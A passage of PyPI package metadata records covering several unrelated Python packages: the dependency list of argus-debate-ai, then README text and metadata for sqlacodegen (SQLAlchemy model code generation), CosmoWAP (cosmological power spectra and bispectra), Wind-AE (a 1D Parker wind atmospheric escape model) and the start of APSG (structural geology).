"textual<1.0,>=0.47",
"pytest<9.0,>=7.4; extra == \"dev\"",
"pytest-asyncio<1.0,>=0.21; extra == \"dev\"",
"pytest-cov<6.0,>=4.1; extra == \"dev\"",
"black<25.0,>=23.0; extra == \"dev\"",
"ruff<1.0,>=0.1; extra == \"dev\"",
"mypy<2.0,>=1.5; extra == \"dev\"",
"pre-commit<4.0,>=3.4; extra == \"dev\"",
"ollama<1.0,>=0.2; extra == \"ollama\"",
"llama-cpp-python<1.0,>=0.2; extra == \"llamacpp\"",
"cohere<6.0,>=5.0; extra == \"cohere\"",
"mistralai<1.0,>=0.4; extra == \"mistral\"",
"groq<1.0,>=0.4; extra == \"groq\"",
"together<2.0,>=1.0; extra == \"together\"",
"voyageai<1.0,>=0.2; extra == \"voyage\"",
"boto3<2.0,>=1.34; extra == \"bedrock\"",
"google-cloud-aiplatform<2.0,>=1.40; extra == \"vertex\"",
"fastembed<1.0,>=0.2; extra == \"embeddings\"",
"cohere<6.0,>=5.0; extra == \"embeddings\"",
"voyageai<1.0,>=0.2; extra == \"embeddings\"",
"nomic<4.0,>=3.0; extra == \"embeddings\"",
"duckduckgo-search<6.0,>=5.0; extra == \"tools\"",
"wikipedia<2.0,>=1.4; extra == \"tools\"",
"arxiv<3.0,>=2.1; extra == \"tools\"",
"tavily-python<1.0,>=0.3; extra == \"tools\"",
"PyGithub<3.0,>=2.1; extra == \"tools\"",
"youtube-transcript-api<1.0,>=0.6; extra == \"tools\"",
"sqlalchemy<3.0,>=2.0; extra == \"tools\"",
"pandas<3.0,>=2.0; extra == \"tools\"",
"yfinance<1.0,>=0.2; extra == \"tools\"",
"agentops<1.0,>=0.3; extra == \"tools-extended\"",
"google-cloud-bigquery<4.0,>=3.0; extra == \"tools-extended\"",
"google-cloud-pubsub<3.0,>=2.0; extra == \"tools-extended\"",
"google-cloud-trace<2.0,>=1.0; extra == \"tools-extended\"",
"google-cloud-aiplatform<2.0,>=1.40; extra == \"tools-extended\"",
"chromadb<1.0,>=0.4; extra == \"tools-extended\"",
"pinecone-client<4.0,>=3.0; extra == \"tools-extended\"",
"qdrant-client<2.0,>=1.7; extra == \"tools-extended\"",
"pymongo<5.0,>=4.6; extra == \"tools-extended\"",
"asana<6.0,>=5.0; extra == \"tools-extended\"",
"jira<4.0,>=3.0; extra == \"tools-extended\"",
"atlassian-python-api<4.0,>=3.0; extra == \"tools-extended\"",
"notion-client<3.0,>=2.0; extra == \"tools-extended\"",
"python-gitlab<5.0,>=4.0; extra == \"tools-extended\"",
"elevenlabs<2.0,>=1.0; extra == \"tools-extended\"",
"huggingface-hub<1.0,>=0.20; extra == \"tools-extended\"",
"mlflow<3.0,>=2.10; extra == \"tools-extended\"",
"wandb<1.0,>=0.16; extra == \"tools-extended\"",
"arize<8.0,>=7.0; extra == \"tools-extended\"",
"opentelemetry-api<2.0,>=1.20; extra == \"tools-extended\"",
"opentelemetry-sdk<2.0,>=1.20; extra == \"tools-extended\"",
"tiktoken<1.0,>=0.5; extra == \"context\"",
"redis<6.0,>=5.0; extra == \"context\"",
"diskcache<6.0,>=5.6; extra == \"context\"",
"pyyaml<7.0,>=6.0; extra == \"openapi\"",
"jsonschema<5.0,>=4.20; extra == \"openapi\"",
"matplotlib<4.0,>=3.7; extra == \"plotting\"",
"seaborn<1.0,>=0.12; extra == \"plotting\"",
"plotly<6.0,>=5.15; extra == \"plotting\"",
"textual<1.0,>=0.47; extra == \"terminal\"",
"pyinstaller<7.0,>=6.0; extra == \"terminal\"",
"streamlit<2.0,>=1.30; extra == \"viz\"",
"plotly<6.0,>=5.15; extra == \"viz\"",
"networkx<4.0,>=3.0; extra == \"viz\"",
"argus-debate-ai[dev]; extra == \"all\"",
"argus-debate-ai[ollama]; extra == \"all\"",
"argus-debate-ai[cohere]; extra == \"all\"",
"argus-debate-ai[mistral]; extra == \"all\"",
"argus-debate-ai[groq]; extra == \"all\"",
"argus-debate-ai[tools]; extra == \"all\"",
"argus-debate-ai[tools-extended]; extra == \"all\"",
"argus-debate-ai[embeddings]; extra == \"all\"",
"argus-debate-ai[plotting]; extra == \"all\"",
"argus-debate-ai[viz]; extra == \"all\"",
"argus-debate-ai[context]; extra == \"all\"",
"argus-debate-ai[openapi]; extra == \"all\""
] | [] | [] | [] | [
"Homepage, https://github.com/Ronit26Mehta/argus-ai-debate",
"Documentation, https://github.com/Ronit26Mehta/argus-ai-debate#readme",
"Repository, https://github.com/Ronit26Mehta/argus-ai-debate",
"Issues, https://github.com/Ronit26Mehta/argus-ai-debate/issues",
"Changelog, https://github.com/Ronit26Mehta/argus-ai-debate/releases"
] | twine/6.2.0 CPython/3.11.3 | 2026-02-20T09:02:34.613824 | argus_debate_ai-3.1.0.tar.gz | 569,946 | 99/ba/6d585018bb3950436c8ee6efef91f06e136be9f9f63ebb2e355c8c3776b6/argus_debate_ai-3.1.0.tar.gz | source | sdist | null | false | f311269111888f0be7b32d2b4151e5cb | 56e830ccc7d2be9ef18237ee09e1c54e4586f9762813b1ec3ed0cfbcb9d51120 | 99ba6d585018bb3950436c8ee6efef91f06e136be9f9f63ebb2e355c8c3776b6 | null | [
"LICENSE"
] | 208 |
2.4 | sqlacodegen | 4.0.1 | Automatic model code generator for SQLAlchemy | .. image:: https://github.com/agronholm/sqlacodegen/actions/workflows/test.yml/badge.svg
:target: https://github.com/agronholm/sqlacodegen/actions/workflows/test.yml
:alt: Build Status
.. image:: https://coveralls.io/repos/github/agronholm/sqlacodegen/badge.svg?branch=master
:target: https://coveralls.io/github/agronholm/sqlacodegen?branch=master
:alt: Code Coverage
.. image:: https://tidelift.com/badges/package/pypi/sqlacodegen
:target: https://tidelift.com/subscription/pkg/pypi-sqlacodegen
:alt: Tidelift
This is a tool that reads the structure of an existing database and generates the
appropriate SQLAlchemy model code, using the declarative style if possible.
This tool was written as a replacement for `sqlautocode`_, which was suffering from
several issues (including, but not limited to, incompatibility with Python 3 and the
latest SQLAlchemy version).
.. _sqlautocode: http://code.google.com/p/sqlautocode/
Features
========
* Supports SQLAlchemy 2.x
* Produces declarative code that almost looks like it was hand written
* Produces `PEP 8`_ compliant code
* Accurately determines relationships, including many-to-many, one-to-one
* Automatically detects joined table inheritance
* Excellent test coverage
.. _PEP 8: http://www.python.org/dev/peps/pep-0008/
Installation
============
To install, do::
pip install sqlacodegen
To include support for the PostgreSQL ``CITEXT`` extension type (which should be
considered as tested only under a few environments) specify the ``citext`` extra::
pip install sqlacodegen[citext]
To include support for the PostgreSQL ``GEOMETRY``, ``GEOGRAPHY``, and ``RASTER`` types
(which should be considered as tested only under a few environments) specify the
``geoalchemy2`` extra::
pip install sqlacodegen[geoalchemy2]
To include support for the PostgreSQL ``PGVECTOR`` extension type, specify the
``pgvector`` extra::
pip install sqlacodegen[pgvector]
Quickstart
==========
At the minimum, you have to give sqlacodegen a database URL. The URL is passed directly
to SQLAlchemy's `create_engine()`_ method so please refer to
`SQLAlchemy's documentation`_ for instructions on how to construct a proper URL.
Examples::
sqlacodegen postgresql:///some_local_db
sqlacodegen --generator tables mysql+pymysql://user:password@localhost/dbname
sqlacodegen --generator dataclasses sqlite:///database.db
# --engine-arg values are parsed with ast.literal_eval
sqlacodegen oracle+oracledb://user:pass@127.0.0.1:1521/XE --engine-arg thick_mode=True
sqlacodegen oracle+oracledb://user:pass@127.0.0.1:1521/XE --engine-arg thick_mode=True --engine-arg connect_args='{"user": "user", "dsn": "..."}'
To see the list of generic options::
sqlacodegen --help
.. _create_engine(): http://docs.sqlalchemy.org/en/latest/core/engines.html#sqlalchemy.create_engine
.. _SQLAlchemy's documentation: http://docs.sqlalchemy.org/en/latest/core/engines.html
Available generators
====================
The selection of a generator determines the kind of code that gets generated.
The following built-in generators are available:
* ``tables`` (only generates ``Table`` objects, for those who don't want to use the ORM)
* ``declarative`` (the default; generates classes inheriting from ``declarative_base()``)
* ``dataclasses`` (generates dataclass-based models; v1.4+ only)
* ``sqlmodels`` (generates model classes for SQLModel_)
.. _SQLModel: https://sqlmodel.tiangolo.com/
Generator-specific options
==========================
The following options can be turned on by passing them using ``--options`` (multiple
values must be delimited by commas, e.g. ``--options noconstraints,nobidi``):
* ``tables``
* ``noconstraints``: ignore constraints (foreign key, unique etc.)
* ``nocomments``: ignore table/column comments
* ``noindexes``: ignore indexes
* ``nonativeenums``: don't generate Python enum classes for native database ENUM types (e.g., PostgreSQL ENUM); use plain string mapping instead
* ``nosyntheticenums``: don't generate Python enum classes from CHECK constraints with IN clauses (e.g., ``column IN ('value1', 'value2', ...)``); preserves CHECK constraints as-is
* ``noidsuffix``: prevent the special naming logic for single column many-to-one
and one-to-one relationships (see `Relationship naming logic`_ for details)
* ``include_dialect_options``: render a table's dialect options, such as ``starrocks_partition`` for StarRocks-specific options.
* ``keep_dialect_types``: preserve dialect-specific column types instead of adapting to generic SQLAlchemy types.
* ``declarative``
* all the options from ``tables``
* ``use_inflect``: use the ``inflect`` library when naming classes and relationships
(turning plural names into singular; see below for details)
* ``nojoined``: don't try to detect joined-class inheritance (see below for details)
* ``nobidi``: generate relationships in a unidirectional fashion, so only the
many-to-one or first side of many-to-many relationships gets a relationship
attribute, as in v2.x
* ``nofknames``: disable improved relationship naming when multiple FKs or
junction tables connect to the same target. By default, uses FK column names
for one-to-many (e.g., ``simple_items_parent_container``) and junction table
names for many-to-many (e.g., ``students_enrollments``). Reverts to
underscore suffixes (``simple_items_``, ``student_``).
* ``dataclasses``
* all the options from ``declarative``
* ``sqlmodels``
* all the options from ``declarative``
Model class generators
----------------------
The code generators that generate classes try to generate model classes whenever
possible. There are two circumstances in which a ``Table`` is generated instead:
* the table has no primary key constraint (which is required by SQLAlchemy for every
model class)
* the table is an association table between two other tables (see below for the
specifics)
Model class naming logic
++++++++++++++++++++++++
By default, table names are converted to valid PEP 8 compliant class names by replacing
all characters unsuitable for Python identifiers with ``_``. Then, each valid part
(separated by underscores) is title cased, and the parts are joined together,
eliminating the underscores. So, ``example_name`` becomes ``ExampleName``.
If the ``use_inflect`` option is used, the table name (which is assumed to be in
English) is converted to singular form using the "inflect" library. For example,
``sales_invoices`` becomes ``SalesInvoice``. Since table names are not always in
English, and the inflection process is far from perfect, inflection is disabled by
default.
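As a rough illustration (in Python, and a simplified sketch rather than sqlacodegen's actual implementation — it ignores edge cases such as names starting with digits), the default naming rule described above could look like:

```python
import re

def table_name_to_class_name(table_name: str) -> str:
    # Replace characters unsuitable for Python identifiers with "_",
    # then title-case each underscore-separated part and join the parts.
    sanitized = re.sub(r"\W", "_", table_name)
    parts = [p for p in sanitized.split("_") if p]
    return "".join(p[0].upper() + p[1:] for p in parts)

print(table_name_to_class_name("example_name"))    # ExampleName
print(table_name_to_class_name("sales-invoices"))  # SalesInvoices
```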
Relationship detection logic
++++++++++++++++++++++++++++
Relationships are detected based on existing foreign key constraints as follows:
* **many-to-one**: a foreign key constraint exists on the table
* **one-to-one**: same as **many-to-one**, but a unique constraint exists on the
column(s) involved
* **many-to-many**: (not implemented on the ``sqlmodel`` generator) an association table
is found to exist between two tables
A table is considered an association table if it satisfies all of the following
conditions:
#. has exactly two foreign key constraints
#. all its columns are involved in said constraints
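The two conditions can be sketched with a hypothetical helper (illustrative only, not part of sqlacodegen's API) that takes a table's column names and the column sets of its foreign key constraints:

```python
def is_association_table(columns: set, fk_constraints: list) -> bool:
    # Condition 1: exactly two foreign key constraints
    if len(fk_constraints) != 2:
        return False
    # Condition 2: every column is involved in one of those constraints
    covered = set().union(*fk_constraints)
    return columns <= covered

# A classic join table qualifies:
print(is_association_table({"student_id", "course_id"},
                           [{"student_id"}, {"course_id"}]))  # True
# An extra payload column disqualifies it (a model class is generated instead):
print(is_association_table({"student_id", "course_id", "grade"},
                           [{"student_id"}, {"course_id"}]))  # False
```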
Relationship naming logic
+++++++++++++++++++++++++
Relationships are typically named based on the table name of the opposite class.
For example, if a class has a relationship to another class with the table named
``companies``, the relationship would be named ``companies`` (unless the ``use_inflect``
option was enabled, in which case it would be named ``company`` in the case of a
many-to-one or one-to-one relationship).
A special case for single column many-to-one and one-to-one relationships, however, is
if the column is named like ``employer_id``. Then the relationship is named ``employer``
due to that ``_id`` suffix.
For self referential relationships, the reverse side of the relationship will be named
with the ``_reverse`` suffix appended to it.
When multiple foreign keys or junction tables connect to the same target table,
relationships use qualifiers for disambiguation. One-to-many relationships use FK
column names (e.g., ``simple_items_parent_container``, ``simple_items_top_container``).
Many-to-many relationships use junction table names (e.g., ``students_enrollments``,
``students_waitlist``), except for self-referential cases which use FK column names
(e.g., ``parent``, ``child``). The ``nofknames`` option reverts to underscore suffixes
(``simple_items_``, ``student_``).
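A minimal sketch of the ``_id`` suffix rule for single column relationships (hypothetical helper, not sqlacodegen internals):

```python
def relationship_name(target_table: str, fk_column: str) -> str:
    # Special case: a column named like ``employer_id`` drops the ``_id``
    # suffix; otherwise fall back to the target table's name.
    if fk_column.endswith("_id") and len(fk_column) > len("_id"):
        return fk_column[: -len("_id")]
    return target_table

print(relationship_name("companies", "employer_id"))  # employer
print(relationship_name("companies", "owner"))        # companies
```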
Customizing code generation logic
=================================
If the built-in generators with all their options don't quite do what you want, you can
customize the logic by subclassing one of the existing code generator classes. Override
whichever methods you need, and then add an `entry point`_ in the
``sqlacodegen.generators`` namespace that points to your new class. Once the entry point
is in place (you typically have to install the project with ``pip install``), you can
use ``--generator <yourentrypoint>`` to invoke your custom code generator.
For examples, you can look at sqlacodegen's own entry points in its `pyproject.toml`_.
.. _entry point: https://setuptools.readthedocs.io/en/latest/userguide/entry_point.html
.. _pyproject.toml: https://github.com/agronholm/sqlacodegen/blob/master/pyproject.toml
Getting help
============
If you have problems or other questions, you should start a discussion on the
`sqlacodegen discussion forum`_. As an alternative, you could also try your luck on the
sqlalchemy_ room on Gitter.
.. _sqlacodegen discussion forum: https://github.com/agronholm/sqlacodegen/discussions/categories/q-a
.. _sqlalchemy: https://app.gitter.im/#/room/#sqlalchemy_community:gitter.im
Security contact information
============================
To report a security vulnerability, please use the `Tidelift security contact`_.
Tidelift will coordinate the fix and disclosure.
.. _Tidelift security contact: https://tidelift.com/security
| text/x-rst | null | Alex Grönholm <alex.gronholm@nextday.fi> | null | Idan Sheinberg <ishinberg0@gmail.com> | null | sqlalchemy | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Environment :: Console",
"Topic :: Database",
"Topic :: Software Development :: Code Generators",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"SQLAlchemy>=2.0.29",
"inflect>=4.0.0",
"sqlmodel>=0.0.22; extra == \"sqlmodel\"",
"sqlalchemy-citext>=1.7.0; extra == \"citext\"",
"geoalchemy2>=0.17.0; extra == \"geoalchemy2\"",
"pgvector>=0.2.4; extra == \"pgvector\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/agronholm/sqlacodegen/issues",
"Source Code, https://github.com/agronholm/sqlacodegen"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:02:14.080568 | sqlacodegen-4.0.1.tar.gz | 53,393 | c3/7b/365cddb20e8510efbe797964a0765b722c672f9534283fd154fceb6d7f93/sqlacodegen-4.0.1.tar.gz | source | sdist | null | false | c33825825c165574e32d1cadbfa7da4c | 98da03f3bf68e7966af609c5431b4706adb9c744a1690c01101298b05dc402f9 | c37b365cddb20e8510efbe797964a0765b722c672f9534283fd154fceb6d7f93 | MIT | [
"LICENSE"
] | 4,064 |
2.4 | cosmowap | 0.6.1 | package for computing power spectra and bispectra | # CosmoWAP
```
______ _ _____ ____
/ ____/___ _________ ___ ____| | / / | / __ \
/ / / __ \/ ___/ __ `__ \/ __ \ | /| / / /| | / /_/ /
/ /___/ /_/ (__ ) / / / / / /_/ / |/ |/ / ___ |/ ____/
\____/\____/____/_/ /_/ /_/\____/|__/|__/_/ |_/_/
```
[](https://pypi.org/project/cosmowap/)
[](https://github.com/craddis1/CosmoWAP/blob/main/LICENCE)
[](https://readthedocs.org/projects/cosmowap/builds/)
[](https://app.codacy.com/gh/craddis1/CosmoWAP/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade)
[](https://ascl.net/2507.020)
[](https://pepy.tech/projects/cosmowap)
**Cosmo**logy with **W**ide-separation, rel**A**tivistic and **P**rimordial non-Gaussian contributions.
CosmoWAP is an effort to provide a (hopefully) self-consistent framework to compute contributions within standard perturbation theory to the Fourier power spectrum and bispectrum, including wide-separation and relativistic effects as well as Primordial non-Gaussianity (PNG).
These expressions can be very cumbersome, and it can be tricky to check for consistency across the community, so hopefully this code is useful in that regard.
CosmoWAP is a *Python* package to analyse the power spectra and bispectra, but the analytical expressions themselves are derived in Mathematica using routines which are publicly available at [*MathWAP*](https://github.com/craddis1/MathWAP) and then exported as .py files. Therefore the main functionality of CosmoWAP is to take these expressions and implement them for a given cosmology (from CLASS) and set of survey parameters.
## [*Documentation*](https://cosmowap.readthedocs.io/en/latest/)
[](https://cosmowap.readthedocs.io/en/latest/)
Full documentation is available at [*ReadtheDocs*](https://cosmowap.readthedocs.io/en/latest/).
> [!NOTE]
> Note that the documentation is still in progress, as this is an evolving repo!
> Occasionally parts will be outdated or contain deprecated methods.
## Installation
> [!NOTE]
> Requires at least Python >=3.10 for full functionality.
> For use of CosmoPower emulators we recommend using Python 3.10 or 3.11 - See Docs for full details.
``` sh
pip install cosmowap
```
For development mode, first clone the repository:
``` sh
git clone https://github.com/craddis1/CosmoWAP.git
```
and then make editable install:
``` sh
cd CosmoWAP
pip install -e .
```
See requirements.txt for the full list of dependencies (most are common Python libraries). classy (the CLASS Python wrapper) is necessary to use CosmoWAP fully.
## Features
CosmoWAP's aim is to provide self-consistent modelling of the linear bispectrum and power spectrum. It contains redshift-space expressions for the 3D Fourier *power spectrum* (multipoles and full LOS-dependent expressions, with multi-tracer capabilities) as well as the *bispectrum* (with Scoccimarro spherical-harmonic multipoles), including terms from:
- Wide separation (WS) effects (i.e. wide angle and radial redshift contributions) up to second order in the WS expansion
- Local Relativistic (GR) effects (including projection and dynamical effects) up to $\left(\frac{\mathcal{H}}{k}\right)^2$
- Integrated effects (e.g. lensing + ISW...) (power spectrum only, currently)
- Primordial non-Gaussian (PNG) contribution for local, equilateral and orthogonal types
It also has a fully integrated forecasting and plotting library that allows these expressions to be explored.
### Additional features
- Bias modelling through luminosity functions and HOD/HMF
- Multi-tracer multipole covariances (assuming Gaussianity)
- Finger-of-God damping and non-linear corrections
- TriPOSH bispectrum expansion terms (Coming soon)
## Usage
The base code is based on work in [arXiv:2407.00168](https://arxiv.org/abs/2407.00168).
For integrated effects see: [arXiv:2511.09466](https://arxiv.org/abs/2511.09466).
For PNG and forecasting routines, please also refer to: arXiv:25xx.xxxx
## Contact
If you find any bugs or errors or have any questions and suggestions feel free to get in touch :) - c.l.j.addis@qmul.ac.uk
| text/markdown | null | Chris Addis <c.l.j.addis@qmul.ac.uk> | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy",
"scipy>=1.15.0",
"matplotlib",
"tqdm",
"cython",
"classy<3.3.2.0",
"chainconsumer",
"cobaya"
] | [] | [] | [] | [
"homepage, https://github.com/craddis1/CosmoWAP"
] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T09:01:34.900781 | cosmowap-0.6.1.tar.gz | 4,992,434 | ca/a7/3def949fa326b9cd40d7efc6cf27712d761a71b511d87737ff3ab16cb64a/cosmowap-0.6.1.tar.gz | source | sdist | null | false | 6c1dc7250780ad70e15c429648a5600e | 9274f834e509a24a0939999cbcdf510d50db2a781adac230a52586ba77eda200 | caa73def949fa326b9cd40d7efc6cf27712d761a71b511d87737ff3ab16cb64a | null | [
"LICENSE.txt"
] | 214 |
2.4 | wind_ae | 1.0.1 | 1D relaxation Parker wind model with metal and X-ray physics based on Murray-Clay et al. (2009) | <img src="docs/windae_logo_blue_light.png" alt="Wind-AE Logo" width="350"/>
<h1></h1>
<h1 style="text-align: center;"><a href="https://wind-ae.readthedocs.io/en/latest/">Read the Docs</a></h1>
<!-- <button type="button">Click Me!</button> -->
`Wind-AE` (pronounced /windy/) stands for "wind atmospheric escape" and is a relatively fast 1D, steady-state, hydrodynamic, non-isothermal, Parker wind relaxation code for modeling atmospheric escape based on [Murray-Clay et al. (2009)](https://ui.adsabs.harvard.edu/abs/2009ApJ...693...23M/abstract). `Wind-AE` is a forward model that solves the energy conservation, momentum conservation, and ionization equilibrium equations at the substellar point using the ["Numerical Recipes in C"](https://ui.adsabs.harvard.edu/abs/1992nrca.book.....P/abstract) relaxation method. This allows `Wind-AE` to quickly compute the atmosphere mass loss rate as well as upper atmosphere (<~100 microbar) velocity, temperature, density, and ionization structure as a function of altitude.
`Wind-AE` updates [Murray-Clay et al. (2009)](https://ui.adsabs.harvard.edu/abs/2009ApJ...693...23M/abstract) to allow for the modeling of atomic metals and multifrequency XUV stellar spectra (Broome et al. submitted). If you use `Wind-AE`, please consider citing Broome et al. (submitted).
We appreciate your patience while the docs are developed. In the meantime, take advantage of `Notebooks/Quickstart.ipynb` to get a quick orientation to `Wind-AE` and please report any bugs via [Github](https://github.com/mabroome/wind-ae/issues) or via email to mabroome@ucsc.edu.

[](https://coveralls.io/github/mibroome/wind-ae?branch=main)


[](https://opensource.org/licenses/BSD-3-Clause)
[](https://semaphorep.github.io/codeastro/)
Is Wind-AE the right tool for me?
----------------------
`Wind-AE` is well-suited for users interested in **quickly estimating mass loss rates** or outflow structure. Outflow structure includes bulk temperature and per-species ionization fractions as a function of radius, so it can be easily translated into approximating and **predicting observables and transits**, including metastable helium (He 10830$\AA$) transits, though a He transit module is not yet included. Precise modeling of the lower atmosphere ($\lesssim 100\,\mu$bar) is considered necessary for highly accurate transit models, but Wind-AE can be easily coupled to lower-atmosphere photochemistry models, whose outputs (e.g., radius, temperature, abundances, ionization fractions at 1 $\mu$bar) can be fed into Wind-AE as inputs.
>*If you are interested in outflow structure:* Past the Coriolis turning radius (a few planetary radii) 3D physics dominates, so `Wind-AE` does not integrate past that point. `Wind-AE` also makes simplifying assumptions about the region below the wind-launch radius (~10 nanobars).
Because `Wind-AE` runs on the order of seconds to minutes, it can be (and has been) used to **model planet evolution** [(Tang et al. 2025)](https://ui.adsabs.harvard.edu/abs/2025ApJ...995...20T/abstract).
#### `Wind-AE` can model:
- Multiple atomic species
- X-ray physics (secondary ionizations and K-shell ionization cross-sections for relevant metals)
- Both low and high stellar XUV flux
- **Heating & Cooling**: Ionization heating, bolometric heating & cooling (negligible in wind), PdV cooling (work done due to expansion of gas), radiative / atomic line cooling (Lyman-$\alpha$, OI, OII, OIII, CI, CII), recombination cooling
#### `Wind-AE` does not (currently) include:
- **Magnetic fields**
- **Time dependence**
- **Diffusion/drag** - the atomic species set by the user are assumed to be entrained in the outflow and in thermal equilibrium. This is an appropriate assumption for species below the [crossover mass](https://ui.adsabs.harvard.edu/abs/1987Icar...69..532H); a warning will be raised otherwise.
- **Heating & Cooling**: Conduction (warning raised if relevant, **planned**), H3+ line cooling (not planned), Fe & Ca line cooling (relevant at high Z only, **planned**), free-free cooling (warning raised if relevant, not planned)
- Multiple ionization states of the same species (**planned**)
See [Broome et al. (2025)](https://ui.adsabs.harvard.edu/abs/2025ApJ...995..198B/abstract) for more details.
- Want a rapid H/He model with power-law approximated XUV spectra? Check out [ATES](https://github.com/AndreaCaldiroli/ATES-Code) ([Caldiroli et al. 2021](https://ui.adsabs.harvard.edu/abs/2021A%26A...655A..30C/abstract))
- Do you want to set the mass loss rate ($\dot{M}$) yourself or want an EUV isothermal Parker wind outflow model that runs in nanoseconds? Check out [p-winds](https://github.com/ladsantos/p-winds) ([Dos Santos et al. 2022](https://ui.adsabs.harvard.edu/abs/2022A%26A...659A..62D/abstract)).
- Do you want to use p-winds and get transit models for metals via Cloudy? Check out [Sunbather](https://github.com/antonpannekoek/sunbather) ([Linssen et al. 2024](https://ui.adsabs.harvard.edu/abs/2024A%26A...688A..43L/abstract))
- Want to leverage Cloudy and the hydrodynamic code PLUTO for more thorough XUV-irradiated, but slightly more expensive calculations? Check out TPCI ([Salz et al. 2015](https://ui.adsabs.harvard.edu/abs/2015A%26A...576A..21S/abstract))
- That sounds great, but you prefer to code in Python over C/C++? Check out [pyTPCI](https://ascl.net/2506.012) ([Riley, Zhang, & Bean 2025](https://ui.adsabs.harvard.edu/abs/2025ApJ...980...34R/abstract))
- Do you care about diffusion throughout the wind? Check out [AIOLIS](https://github.com/Schulik/aiolos) ([Schulik & Booth, 2022](https://ui.adsabs.harvard.edu/abs/2023MNRAS.523..286S/abstract)).
- Want to model the lower atmosphere in more detail? Check out CETIMB (Koskinen et al. 2022)
- Just want a grid of mass loss rates for pure-Hydrogen, low-flux-EUV-irradiated planets? See [Kubyshkina & Fossati](https://ui.adsabs.harvard.edu/abs/2021RNAAS...5...74K/abstract)
- Want a grid of mass loss rates for pure-Hydrogen, high-flux-XUV-irradiated planets? See [Owen & Jackson (2012)](https://ui.adsabs.harvard.edu/abs/2012MNRAS.425.2931O/abstract)
>Want your model added to this list or to update the short bio? Email mabroome@ucsc.edu
Requirements
------------
`Wind-AE` requires the following packages, which are pip-installed automatically when following the installation guide below.
* `python`>=3.13
* `numpy`
* `scipy`
* `astropy`
* `pandas`>=2.2.3
* `matplotlib`
* `datetime`
* `pyarrow`
* `fastparquet`
* `requests`
* `ChiantiPy`
Installation
------------
Until `Wind-AE` is dockerized, it is recommended to use a Python environment to avoid dependency issues. However, if your system meets the above requirements, there is no need to create an environment and you can skip straight to installation.
To create an environment use either
```bash
python3 -m venv venv_name.venv
source venv_name.venv/bin/activate
```
or using `conda`
```bash
conda create -n venv_name
conda activate venv_name
conda install pip
```
### Pip install
Recommended:
```bash
pip install --upgrade pip
```
Then
```bash
pip install wind_ae
```
### OR Compile from source (BETA)
Clone the repository using
```bash
git clone https://github.com/mibroome/wind-ae/
```
or navigate to [github.com/mibroome/wind-ae/](https://github.com/mibroome/wind-ae/) and download and unzip the zip file.
To compile from source:
```bash
pip install -r requirements.txt
pip install -e .
```
### Confirming the import was successful
Run tests (optional). Estimated time: 4 minutes.
```bash
cd wind-ae && pytest
```
Otherwise, you can test the install by running
```bash
python -c "import wind_ae"
```
Now you can run `Wind-AE` from anywhere! As seen in the tutorial (`Notebooks/Quickstart.ipynb`), the following imports are helpful for most purposes.
```python
from wind_ae.wrapper.relax_wrapper import wind_simulation as wind_sim
from wind_ae.wrapper.wrapper_utils.plots import energy_plot, six_panel_plot, quick_plot
from wind_ae.wrapper.wrapper_utils import constants as const
from wind_ae.wrapper.wrapper_utils.system import system
from wind_ae.wrapper.wrapper_utils.spectrum import spectrum
```
> **Note**: If you ever need to interface directly with the `C` code, it lives in `wind_ae/src/` and can be executed from within the `wind_ae/` folder via `./bin/relaxed_ae`. The solution generated will be for a planet with the parameters detailed in the input files in the `Inputs/` folder. There is generally no need to interface with the `C` code, and most standard tasks can be accomplished using the Python wrapper.
## Future features and known problems:
- Computation of the complementary error function that governs the drop-off of bolometric heating/cooling is not truly self-consistent (`converge_mol_atomic_transition(polish=True, width=)`). It may require visual confirmation via `energy_plot()` (checking whether bolometric heating/cooling impinges too far into photoionization heating or falls too short) and manual adjustment of the `width` parameter, or:
```python
import numpy as np

# sim is a wind_simulation instance (see the imports above)
sim.load_planet('path/to/planet/file')
bcs = np.copy(sim.windsoln.bcs_tuple)
# erf_loc - normalized velocity value at radius where you want the erf to drop
# erf_rate - how quickly the erf drops off in units of Hsc at erf_loc
# To get initial estimate, run sim.erf_velocity(polish=True)
bcs[-1] = np.array([erf_loc, erf_rate])
sim.inputs.write_bcs(*bcs)
sim.run_wind()
```
- Knudsen number calculations currently only contain H-H collisions.
- Converting spectrum ``kind`` from ``'full'`` to ``'mono'`` occasionally has issues.
--------
### Check out the [open issues](https://github.com/mabroome/wind-ae/issues).
| text/markdown | Madelyn Broome, John McCann, Ruth Murray-Clay | null | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent"
] | [] | null | null | >=3.13 | [] | [] | [] | [
"scipy>1.6",
"numpy",
"astropy",
"IPython",
"pandas>=2.2.3",
"matplotlib",
"datetime",
"pyarrow",
"fastparquet",
"requests",
"ChiantiPy",
"pytest"
] | [] | [] | [] | [
"Homepage, https://github.com/mibroome/wind_ae",
"Issues, https://github.com/mibroome/wind_ae/issues"
] | uv/0.8.12 | 2026-02-20T09:01:25.355931 | wind_ae-1.0.1.tar.gz | 1,554,390 | 78/35/bd9ffec377d9184d0ebd4ad695af5a4754b046f3df022ad56546e8ddf90f/wind_ae-1.0.1.tar.gz | source | sdist | null | false | a60b2f9173ddf8c7007a35bcb9374d0f | 21eddffaeba508b0e7b05120f587822adce52e4b634ed9b96703f810476ee9e9 | 7835bd9ffec377d9184d0ebd4ad695af5a4754b046f3df022ad56546e8ddf90f | BSD-3-Clause | [
"LICENSE"
] | 0 |
2.4 | apsg | 1.4.0 | APSG - The package for structural geologists | <img src="https://ondrolexa.github.io/apsg/apsg_banner.svg" alt="APSG logo" width="300px"/>
[](https://pypi.org/project/apsg)
[](https://anaconda.org/conda-forge/apsg)
[](https://apsg.readthedocs.io/en/stable/?badge=stable)
[](https://zenodo.org/badge/latestdoi/24879346)
## :thinking: What is APSG?
APSG is the package for structural geologists. It defines several new Python classes to easily manage, analyze and visualize orientational structural geology data.
